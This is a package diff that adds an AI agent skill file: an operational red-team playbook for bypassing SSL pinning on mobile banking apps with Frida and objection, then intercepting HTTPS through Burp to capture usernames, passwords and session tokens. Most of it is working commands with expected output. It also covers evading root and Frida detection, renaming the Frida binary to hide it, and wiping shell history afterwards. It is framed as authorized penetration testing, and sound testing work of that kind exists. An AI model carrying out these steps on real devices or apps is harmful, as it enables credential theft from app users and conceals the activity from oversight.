rtexit-method 0.1.0 → 0.1.2

package/packaged-assets/.agents/skills/rt-scenario-m002/SKILL.md

@@ -0,0 +1,723 @@
+---
+name: rt-scenario-m002
+description: "M-002: SSL Pinning Bypass → MITM → Credential Interception. Domain: mobile. Attack chain: jailbreak/root device → install Frida → run objection → disable SSL pinning → configure Burp proxy → capture all HTTPS traffic including credentials. MITRE: T1557 → T1539 → T1078. Real example: Banking app: objection sslpinning disable → Burp captures username/password in login request"
+---
+
+# M-002: SSL Pinning Bypass → MITM → Credential Interception
+
+## Overview
+
+**Attack Objective:** Bypass SSL/TLS certificate pinning on a mobile application to intercept HTTPS traffic via a man-in-the-middle (MITM) proxy, capturing authentication credentials and session tokens transmitted between the app and its backend API.
+
+**Required Access Level:** Low — physical or logical access to a jailbroken/rooted mobile device running the target application. No server-side access required.
+
+**Estimated Time to Execute:**
+- Device preparation (jailbreak/root): 30–120 minutes (device-dependent; may already be done)
+- Frida and objection installation: 15–30 minutes
+- SSL pinning bypass: 5–15 minutes
+- Burp Suite proxy configuration: 10–20 minutes
+- Traffic capture and credential extraction: 10–30 minutes (dependent on app behavior)
+
+**Detection Risk Level:** Low
+- Attack is entirely client-side — no network anomalies visible to server-side monitoring
+- Device-level tampering is not detectable by the server unless jailbreak/root detection is implemented in the app
+- All captured traffic appears as normal application traffic from the server's perspective
+- Risk increases only if the app implements jailbreak/root detection or Frida detection
+
+---
+
+## Prerequisites
+
+### Required Tools
+
+```bash
+# --- On the attacker machine (macOS/Linux/Windows) ---
+
+# Frida — dynamic instrumentation toolkit
+pip install frida-tools
+# Verify installation
+frida --version
+
+# objection — runtime mobile exploration toolkit (wraps Frida)
+pip install objection
+# Verify installation
+objection --version
+
+# Burp Suite Community or Professional
+# Download from: https://portswigger.net/burp/communitydownload
+# Or install via brew on macOS:
+brew install --cask burp-suite
+
+# adb (Android Debug Bridge) — for Android targets
+# Install Android SDK Platform Tools:
+# https://developer.android.com/studio/releases/platform-tools
+# macOS:
+brew install android-platform-tools
+# Linux:
+sudo apt install adb
+# Verify:
+adb version
+
+# apktool — for inspecting and repackaging APKs (optional)
+sudo apt install apktool
+# macOS:
+brew install apktool
+
+# --- On iOS targets: install via Cydia/Sileo on jailbroken device ---
+# Frida (iOS): add https://build.frida.re to Cydia sources → install "Frida"
+# OpenSSH: install via Cydia for remote access
+# SSL Kill Switch 2 (alternative to Frida): install via Cydia
+
+# --- On Android targets: install via device ---
+# Frida server binary — download matching version for device architecture
+# https://github.com/frida/frida/releases
+# Example for arm64 Android:
+wget https://github.com/frida/frida/releases/download/16.2.1/frida-server-16.2.1-android-arm64.xz
+unxz frida-server-16.2.1-android-arm64.xz
+
+# mitmproxy — alternative to Burp Suite (command-line)
+pip install mitmproxy
+```
+
+### Required Access or Conditions
+
+- Physical access to a mobile device (iOS jailbroken or Android rooted/debug-enabled)
+- Target application installed and functional on the device
+- Attacker machine and mobile device on the same Wi-Fi network (for proxy routing)
+- USB cable for adb connectivity (Android) or SSH over Wi-Fi (iOS)
+- Burp Suite CA certificate available for device installation
+- Scope confirmation: target app and API endpoints authorized in Rules of Engagement
+
+### Skill Level
+
+**INTERMEDIATE** — Requires familiarity with mobile application architecture, HTTP/HTTPS proxy configuration, Frida scripting basics, and Android/iOS device management.
+
+---
+
+## Attack Chain
+
+```
+[1] Prepare Device (jailbreak iOS / root Android)
+        |
+        v
+[2] Install Frida server on device
+        |
+        v
+[3] Verify Frida connectivity from attacker machine
+        |
+        v
+[4] Configure Burp Suite as HTTPS proxy
+        |
+        v
+[5] Install Burp CA certificate on device
+        |
+        v
+[6] Route device traffic through Burp proxy
+        |
+        v
+[7] Launch target app via objection
+        |
+        v
+[8] Disable SSL pinning with objection
+        |
+        v
+[9] Interact with app — trigger authentication flow
+        |
+        v
+[10] Capture credentials and tokens in Burp HTTP History
+```
+
+**MITRE ATT&CK Chain:** T1557 (Adversary-in-the-Middle) → T1539 (Steal Web Session Cookie) → T1078 (Valid Accounts)
+
+---
+
+## Step-by-Step Execution
+
+### Step 1 — Device Preparation
+
+#### Android (Root)
+
+```bash
+# Option A: Use an Android emulator with root (no physical device needed)
+# Install Android Studio → create AVD with Google APIs image (rootable)
+# Start emulator:
+emulator -avd Pixel_6_API_33 -writable-system &
+
+# Root the emulator:
+adb root
+adb remount
+# Expected output: "remount succeeded"
+
+# Option B: Physical rooted Android device
+# Verify root via adb:
+adb shell su -c "id"
+# Expected output: uid=0(root) gid=0(root)
+
+# Enable USB Debugging on device:
+# Settings → Developer Options → USB Debugging → ON
+
+# Connect device and verify adb sees it:
+adb devices
+# Expected output:
+# List of devices attached
+# emulator-5554  device
+```
+
+#### iOS (Jailbroken)
+
+```bash
+# Verify jailbreak is active and SSH is available
+ssh root@<device-ip>
+# Default password: alpine (change immediately on real engagements)
+
+# Verify Frida is installed via Cydia:
+frida-ps -U
+# Expected output: list of running processes on device
+```
+
+**Fallback:** If the device cannot be rooted/jailbroken, use:
+- Android: Use an older Android version (8.x) where root exploits are publicly available
+- iOS: Use checkra1n or palera1n for A8–A11 chip devices (semi-tethered jailbreak)
+- Alternative: Repackage the APK with Frida gadget embedded (bypasses need for root — see Step 2 alternative)
+
+---
+
+### Step 2 — Install and Start Frida Server on Device
+
+#### Android
+
+```bash
+# Download Frida server matching your frida-tools version and device ABI
+# Check device ABI:
+adb shell getprop ro.product.cpu.abi
+# Expected output: arm64-v8a  (or armeabi-v7a, x86, x86_64)
+
+# Download matching server binary (example: arm64)
+wget https://github.com/frida/frida/releases/download/16.2.1/frida-server-16.2.1-android-arm64.xz
+unxz frida-server-16.2.1-android-arm64.xz
+mv frida-server-16.2.1-android-arm64 frida-server
+
+# Push to device
+adb push frida-server /data/local/tmp/frida-server
+adb shell chmod 755 /data/local/tmp/frida-server
+
+# Start Frida server on device (as root)
+adb shell su -c "/data/local/tmp/frida-server &"
+# No output expected — server runs in background
+
+# Verify Frida server is running
+adb shell su -c "ps -A | grep frida"
+# Expected output:
+# root     12345  1   ...  frida-server
+```
+
+#### iOS
+
+```bash
+# Frida installs as a daemon via Cydia — starts automatically
+# Verify connectivity:
+frida-ps -U
+# Expected output: list of iOS processes including SpringBoard, etc.
+```
+
+**Alternative (no root — APK repackaging for Android):**
+
+```bash
+# Inject Frida gadget into APK — no root required
+# Use objection to patch the APK:
+objection patchapk --source target-app.apk
+# Output: target-app.objection.apk
+
+# Install patched APK
+adb install target-app.objection.apk
+# Launch app — Frida gadget initializes automatically
+```
+
+---
+
+### Step 3 — Verify Frida Connectivity
+
+```bash
+# From attacker machine — list processes on connected device
+frida-ps -U
+# Expected output (Android):
+# PID   Name
+# ----  ----------------------------------------
+# 1234  com.target.bankingapp
+# 5678  com.android.launcher3
+# ...
+
+# If using network (Wi-Fi) instead of USB:
+frida-ps -H <device-ip>
+
+# Identify the target app's process name or PID
+frida-ps -U | grep -i bank
+# Expected output:
+# 1234  com.target.bankingapp
+```
+
+**Fallback:** If `frida-ps` fails with "unable to connect to remote frida-server":
+```bash
+# Check frida-server is running:
+adb shell ps -A | grep frida
+# Restart if needed:
+adb shell su -c "pkill frida-server; /data/local/tmp/frida-server &"
+# Verify frida-tools version matches server version:
+frida --version
+# Download matching server if mismatch
+```
+
+---
+
+### Step 4 — Configure Burp Suite as HTTPS Proxy
+
+```bash
+# Launch Burp Suite → Proxy → Options
+# Add listener:
+#   Bind to port:      8080
+#   Bind to address:   All interfaces (0.0.0.0)
+# Click OK and ensure listener is Running
+
+# Get attacker machine IP on the shared Wi-Fi network
+# Linux/macOS:
+ip addr show | grep "inet " | grep -v 127
+# or
+ifconfig | grep "inet "
+# Windows:
+ipconfig | findstr "IPv4"
+
+# Note the IP — e.g., 192.168.1.100
+# Device will proxy to 192.168.1.100:8080
+```
+
+---
+
+### Step 5 — Install Burp CA Certificate on Device
+
+#### Android
+
+```bash
+# Export Burp CA certificate
+# In Burp Suite: Proxy → Options → Import/Export CA Certificate
+# → Export Certificate in DER format → save as burp-ca.der
+
+# Convert to PEM for Android
+openssl x509 -inform DER -in burp-ca.der -out burp-ca.pem
+
+# Get certificate hash (required for Android system store)
+openssl x509 -inform PEM -subject_hash_old -in burp-ca.pem | head -1
+# Example output: 9a5ba575
+
+# Rename certificate to hash format
+cp burp-ca.pem 9a5ba575.0
+
+# Push to Android system certificate store (requires root/remount)
+adb push 9a5ba575.0 /sdcard/
+adb shell su -c "mount -o rw,remount /system"
+adb shell su -c "cp /sdcard/9a5ba575.0 /system/etc/security/cacerts/"
+adb shell su -c "chmod 644 /system/etc/security/cacerts/9a5ba575.0"
+adb reboot
+# Device reboots — Burp CA is now trusted as a system certificate
+```
+
+#### iOS
+
+```bash
+# Download Burp CA via Safari on the device:
+# Navigate to: http://burp (while proxy is active) → CA Certificate
+# iOS will prompt to install the profile
+
+# After download: Settings → General → VPN & Device Management → Install Burp CA
+# Then: Settings → General → About → Certificate Trust Settings → Enable Burp CA
+```
+
+**Fallback for Android 7+ (Network Security Config restriction):**
+```bash
+# If app restricts trust to user certs only, bypass via:
+# 1. Repackage APK to add network_security_config.xml allowing user certs:
+#    (objection patchapk handles this automatically)
+# 2. Or use Frida script to patch OkHttp/TrustManager at runtime (see Step 8)
+```
+
+---
+
+### Step 6 — Route Device Traffic Through Burp Proxy
+
+#### Android
+
+```bash
+# On the Android device:
+# Settings → Wi-Fi → Long-press network → Modify Network
+# Advanced options → Proxy → Manual
+#   Proxy hostname: 192.168.1.100   (attacker machine IP)
+#   Proxy port:     8080
+# Save
+
+# Verify proxy is active — open Chrome on device and browse to any site
+# Traffic should appear in Burp Suite → HTTP History
+
+# Alternative — use adb to set proxy programmatically:
+adb shell settings put global http_proxy 192.168.1.100:8080
+# Reset when done:
+adb shell settings delete global http_proxy
+```
+
+#### iOS
+
+```bash
+# Settings → Wi-Fi → (i) next to connected network → Configure Proxy
+# Manual:
+#   Server: 192.168.1.100
+#   Port:   8080
+# Save
+```
+
+---
+
+### Step 7 — Launch Target App via objection
+
+```bash
+# Identify app package name / bundle ID
+# Android:
+adb shell pm list packages | grep -i bank
+# Expected output: package:com.target.bankingapp
+
+# iOS:
+frida-ps -Ua | grep -i bank
+# Expected output:
+# PID   Name                 Identifier
+# ----  -------------------  -------------------------
+# 1234  Target Bank          com.target.bankingapp
+
+# Launch app and attach objection (Android)
+objection --gadget com.target.bankingapp explore
+# Expected output:
+# ....
+# com.target.bankingapp on (Android: 13) [usb] # 
+
+# For iOS:
+objection --gadget "Target Bank" explore
+# Expected output:
+# com.target.bankingapp on (iOS: 16.5) [usb] #
+```
+
+**Fallback:** If objection fails to attach to a running app:
+```bash
+# Spawn the app fresh via objection (kills existing instance):
+objection --gadget com.target.bankingapp explore --startup-command "android sslpinning disable"
+
+# Or attach by PID:
+PID=$(adb shell pidof com.target.bankingapp)
+objection --gadget $PID explore
+```
+
+---
+
+### Step 8 — Disable SSL Pinning with objection
+
+```bash
+# Inside the objection REPL:
+com.target.bankingapp on (Android: 13) [usb] # android sslpinning disable
+
+# Expected output:
+# (agent) Custom TrustManager ready
+# (agent) Overwriting SSLContext.init() with custom TrustManager
+# (agent) OkHTTP 3.x Found
+# (agent) OkHTTP 3.x pinning disabled
+# (agent) Subjectpublickeyinfo.verify() Disabled
+# (agent) SSLPeerUnverifiedException: no peer certificate Disabled
+
+# For iOS targets:
+com.target.bankingapp on (iOS: 16.5) [usb] # ios sslpinning disable
+
+# Expected output:
+# (agent) Disabling SSL pinning
+# (agent) SSLHandshake Pinning Disabled
+# (agent) SecTrustEvaluate, SecTrustEvaluateWithError Pinning Disabled
+```
+
+**Fallback — If objection bypass is incomplete (custom pinning implementations):**
+
+```bash
+# Use a more comprehensive Frida script targeting specific frameworks:
+# Download frida-ios-dump or use the Universal SSL Unpinner:
+
+# Save as ssl-unpinner.js and run:
+frida -U -l ssl-unpinner.js com.target.bankingapp
+
+# For Android with custom certificate validators (OkHttp, Retrofit, Volley):
+# Use the objection android sslpinning disable --quiet command or
+# use Frida script targeting TrustManager directly:
+
+frida -U -l android-ssl-bypass.js com.target.bankingapp
+# Script source: https://github.com/akabe1/frida-multiple-unpinning
+
+# Alternative — Xposed Framework (Android, requires rooted device):
+# Install SSLUnpinning or JustTrustMe module via LSPosed Manager
+```
+
+---
+
+### Step 9 — Interact with App and Trigger Authentication
+
+```bash
+# With SSL pinning disabled and Burp proxy active:
+# Manually interact with the target app on the device:
+# 1. Open the banking/target app
+# 2. Navigate to the login screen
+# 3. Enter test credentials (use authorized test account):
+#    Username: testuser@target.com
+#    Password: TestPassword123!
+# 4. Tap "Login" / "Sign In"
+
+# Simultaneously in Burp Suite:
+# → Proxy → HTTP History
+# Watch for POST requests to the authentication endpoint
+
+# In Burp Suite Intercept (optional — to pause and inspect in real time):
+# Proxy → Intercept → Intercept is ON
+# Each request will pause for review before forwarding
+```
+
+---
+
+### Step 10 — Capture Credentials in Burp HTTP History
+
+```bash
+# In Burp Suite → Proxy → HTTP History
+# Look for POST requests to endpoints like:
+# /api/auth/login
+# /api/v1/authenticate
+# /oauth/token
+# /api/users/signin
+
+# Click on the login request — inspect the Request tab
+# Expected captured request body (JSON format):
+# POST /api/v1/authenticate HTTP/1.1
+# Host: api.targetbank.com
+# Content-Type: application/json
+# Authorization: Bearer <existing-token-if-any>
+#
+# {
+#   "username": "testuser@target.com",
+#   "password": "TestPassword123!",
+#   "device_id": "abc123def456",
+#   "mfa_token": ""
+# }
+
+# Expected response (credential confirmation):
+# HTTP/1.1 200 OK
+# {
+#   "access_token": "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...",
+#   "refresh_token": "dGhpcyBpcyBhIHNhbXBsZSByZWZyZXNoIHRva2Vu",
+#   "expires_in": 3600,
+#   "user_id": "usr_001234"
+# }
+
+# Save captured credentials and tokens as evidence:
+# Right-click request → Save item → capture_login_POST.xml
+# Screenshot the Burp request/response window for report
+
+# Also capture session cookies in Burp → Proxy → HTTP History → Cookies
+# Look for Set-Cookie headers in authentication responses
+```
+
+**Fallback — If credentials are not visible in plaintext:**
+```bash
+# App may use additional encryption layer on top of TLS
+# Check if request body is base64 encoded:
+echo "eyJ1c2VybmFtZSI6InRlc3R1c2VyIn0=" | base64 -d
+
+# Check if payload is compressed:
+# In Burp → Decoder tab → paste body → decode as Base64 → decompress GZIP
+
+# Use Frida to hook the encryption function and extract plaintext before encryption:
+# Identify the encryption class in objection:
+com.target.bankingapp on (Android: 13) [usb] # android hooking list classes | grep -i crypt
+# Then hook and dump arguments:
+com.target.bankingapp on (Android: 13) [usb] # android hooking watch class_method com.target.app.util.CryptoUtil.encrypt --dump-args --dump-return
+```
+
+---
+
+## Real-World Reference
+
+**Scenario: Banking App — objection SSL Pinning Bypass → Credential Capture**
+
+1. Target: A major retail banking application (Android/iOS) communicating with `https://api.bankapp.com`
+2. The app implements SSL certificate pinning using OkHttp's `CertificatePinner` class — Burp proxy initially shows SSL handshake failures
+3. Operator attaches objection to the running app process: `android sslpinning disable`
+4. objection hooks OkHttp's certificate validation chain, overriding the pinned certificate check with a permissive TrustManager
+5. Operator triggers a login in the app using the authorized test account
+6. Burp HTTP History captures the POST to `/api/v1/auth/login` with cleartext JSON body: `{"username":"testuser@bank.com","password":"P@ssw0rd!"}`
+7. Response contains a JWT access token and refresh token — both captured
+8. Finding documented as Critical: SSL pinning implementation is bypassable via Frida, exposing all HTTPS traffic including credentials, account details, and transaction history
+
+**Common Banking App Variants Seen in Practice:**
+- Apps using `TrustKit` (iOS) — bypassed via `ios sslpinning disable` with TrustKit-specific hooks
+- Apps using `network_security_config.xml` with pinned certificates — bypassed via APK repackaging
+- Apps using OkHttp `CertificatePinner` — bypassed by objection hooking `check()` method
+- Apps using custom `X509TrustManager` implementations — bypassed via Frida hooking `checkServerTrusted()`
+
+---
+
+## MITRE ATT&CK Mapping
+
+| Step | Tactic | Technique | Sub-technique | Description |
+|------|--------|-----------|---------------|-------------|
+| 1 — Device Jailbreak/Root | Defense Evasion | T1553 | T1553.002 — Code Signing | Bypassing OS security controls to gain privileged access |
+| 2 — Install Frida Server | Execution | T1059 | T1059.004 — Unix Shell | Deploying dynamic instrumentation runtime on device |
+| 3 — Verify Frida Connectivity | Discovery | T1082 | — | System Information Discovery — enumerating device processes |
+| 4–6 — Proxy Configuration | Collection | T1557 | T1557.002 — ARP Cache Poisoning (conceptually MITM) | Positioning attacker as intermediary for all device HTTPS traffic |
+| 7 — Attach objection | Defense Evasion | T1562 | T1562.001 — Disable or Modify Tools | Attaching to app runtime to manipulate security controls |
+| 8 — Disable SSL Pinning | Defense Evasion | T1553 | T1553.004 — Install Root Certificate | Bypassing certificate validation to enable traffic interception |
+| 9 — Trigger Authentication | Collection | T1557 | — | Adversary-in-the-Middle — intercepting app-to-server communication |
+| 10 — Capture Credentials | Credential Access | T1539 | — | Steal Web Session Cookie — capturing credentials and session tokens |
+| Post — Credential Reuse | Initial Access | T1078 | T1078.003 — Local Accounts | Using captured credentials for further access |
+
+---
+
+## Detection & OPSEC
+
+### How This Attack Is Detected
+
+- **Jailbreak/Root detection:** Many banking apps use SafetyNet Attestation (Android) or jailbreak detection libraries (iOS: DTTJailbreakDetection, IOSSecuritySuite) — triggers app refusal to run or reduced functionality
+- **Frida detection:** Apps may detect Frida by scanning for `frida-agent` in memory, checking for `/data/local/tmp/frida-server`, or detecting the presence of port 27042 (Frida default)
+- **objection detection:** Some apps detect objection-specific Frida scripts by hook name or memory patterns
+- **Certificate pinning failure alerts:** If pinning bypass is incomplete, the app may log certificate errors or alert the backend
+- **Anomalous proxy headers:** Burp Suite inserts `X-Forwarded-For` and other headers — well-instrumented backends may flag these
+- **Device integrity attestation:** Apps using Google Play Integrity API or Apple DeviceCheck can detect rooted/jailbroken devices server-side and reject sessions
+
+### How to Reduce Detection Risk (Authorized Engagements)
+
+```bash
+# 1. Bypass jailbreak/root detection before SSL pinning bypass:
+# In objection REPL:
+com.target.bankingapp on (Android: 13) [usb] # android root disable
+com.target.bankingapp on (Android: 13) [usb] # ios jailbreak disable
+
+# 2. Bypass Frida detection using anti-anti-Frida scripts:
+# Use Frida script that hides the Frida server from detection:
+frida -U -l frida-detect-bypass.js com.target.bankingapp
+# Source: https://github.com/darvincisec/DetectFrida
+
+# 3. Rename Frida server binary to avoid name-based detection:
+adb shell su -c "cp /data/local/tmp/frida-server /data/local/tmp/su_helper"
+adb shell su -c "/data/local/tmp/su_helper &"
+
+# 4. Use a different Frida listening port to avoid port 27042 detection:
+adb shell su -c "/data/local/tmp/frida-server -l 0.0.0.0:12345 &"
+frida-ps -H <device-ip>:12345
+
+# 5. Disable Burp proxy header injection:
+# Burp Suite → Proxy → Options → Miscellanous → Uncheck "Add 'Via' header"
+# Uncheck "Add 'X-Forwarded-For' header"
+
+# 6. Use a certificate that matches the pinned cert's CA (if scope allows):
+# Request a cert from the pinned CA using scope-approved methods
+# (This is rare and complex — typically objection bypass is sufficient)
+
+# 7. Use a real device rather than emulator if root detection checks for emulator artifacts
+adb shell getprop ro.kernel.qemu
+# If output is "1" — emulator detected. Use physical rooted device instead.
+```
+
+### Artifacts Left Behind
+
+| Artifact | Location | Notes |
+|----------|----------|-------|
+| Frida server binary | `/data/local/tmp/frida-server` (Android) | Remove after engagement |
+| Frida server process | Running in device memory | Kill process before cleanup |
+| Burp CA certificate | Device system certificate store | Remove from trusted CAs |
+| Device proxy settings | Android/iOS network settings | Reset proxy to None |
+| Objection logs | Terminal session history on attacker machine | Clear or encrypt |
+| Burp Suite project file | Attacker machine `~/BurpSuite/` | Contains all captured traffic — secure and delete post-engagement |
+| Captured HTTP history | Burp Suite project | Export as evidence then delete local copy |
+| SSH known_hosts (iOS) | `~/.ssh/known_hosts` on attacker machine | Remove device IP entry |
+| ADB connection history | Attacker machine ADB keystore | Located at `~/.android/` |
+| Shell history | Attacker machine `~/.bash_history` or `~/.zsh_history` | Clear after engagement |
+
+---
+
+## Cleanup
+
+Steps to remove artifacts after an authorized engagement:
+
+```bash
+# 1. Kill Frida server on the Android device
+adb shell su -c "pkill frida-server"
+# Or by process name if renamed:
+adb shell su -c "pkill su_helper"
+
+# 2. Remove Frida server binary from device
+adb shell su -c "rm /data/local/tmp/frida-server"
+# If renamed:
+adb shell su -c "rm /data/local/tmp/su_helper"
+
+# 3. Remove Burp CA certificate from Android device
+adb shell su -c "rm /system/etc/security/cacerts/9a5ba575.0"
+# (Use the actual hash you installed in Step 5)
+# Or via device Settings → Security → Encryption & Credentials → Trusted Credentials
+# → System tab → find Burp CA → Remove
+
+# For iOS:
+# Settings → General → VPN & Device Management → Burp CA Profile → Remove
+
+# 4. Reset device proxy settings
+# Android — reset via adb:
+adb shell settings delete global http_proxy
+# Or manually: Settings → Wi-Fi → Network → Proxy → None
+
+# iOS — manually: Settings → Wi-Fi → (i) → Configure Proxy → Off
+
+# 5. Clear Burp Suite project — export evidence first then:
+# File → Close Project
+# Delete the project file from: ~/BurpSuite/projects/<project-name>.burp
+
+# 6. Remove local credential and evidence files securely
+# Linux/macOS:
+shred -u burp-ca.der burp-ca.pem 9a5ba575.0
+rm -f capture_login_POST.xml
+
+# 7. Clear SSH known_hosts entry for iOS device
+ssh-keygen -R <device-ip>
+
+# 8. Clear ADB connection history (optional)
+rm -f ~/.android/adbkey ~/.android/adbkey.pub
+
+# 9. Clear shell history on attacker machine
+history -c && history -w
+# zsh:
+rm ~/.zsh_history
+
+# 10. Document cleanup in engagement report — note:
+# - Frida server removed from device
+# - CA certificate removed from device trust store
+# - Proxy configuration restored to default
+# - No persistent backdoors or modifications left on device
+```
+
+---
+
+## References
+
+| Resource | URL |
+|----------|-----|
+| Frida documentation | https://frida.re/docs/ |
+| Frida releases (server binaries) | https://github.com/frida/frida/releases |
+| objection documentation | https://github.com/sensepost/objection |
+| objection SSL pinning bypass | https://github.com/sensepost/objection/wiki/Patching-Android-Applications |
+| Burp Suite mobile testing guide | https://portswigger.net/support/configuring-an-android-device-to-work-with-burp |
+| Frida multiple unpinning script | https://github.com/akabe1/frida-multiple-unpinning |
+| SSL Kill Switch 2 (iOS) | https://github.com/nabla-c0d3/ssl-kill-switch2 |
+| TrustKit bypass (iOS) | https://github.com/OWASP/owasp-mstg |
+| OWASP Mobile Security Testing Guide | https://mas.owasp.org/MASTG/ |
+| OWASP MASTG — Testing Network Communication | https://mas.owasp.org/MASTG/tests/android/MASVS-NETWORK/ |
+| Android Network Security Configuration | https://developer.android.com/training/articles/security-config |
+| Google Play Integrity API | https://developer.android.com/google/play/integrity |
+| NowSecure SSL Pinning Bypass | https://www.nowsecure.com/blog/2017/06/15/certificate-pinning-for-android-and-ios/ |
+| MITRE T1557 — Adversary-in-the-Middle | https://attack.mitre.org/techniques/T1557/ |
+| MITRE T1539 — Steal Web Session Cookie | https://attack.mitre.org/techniques/T1539/ |
+| MITRE T1078 — Valid Accounts | https://attack.mitre.org/techniques/T1078/ |
+| MITRE T1553 — Subvert Trust Controls | https://attack.mitre.org/techniques/T1553/ |
+| MITRE T1562 — Impair Defenses | https://attack.mitre.org/techniques/T1562/ |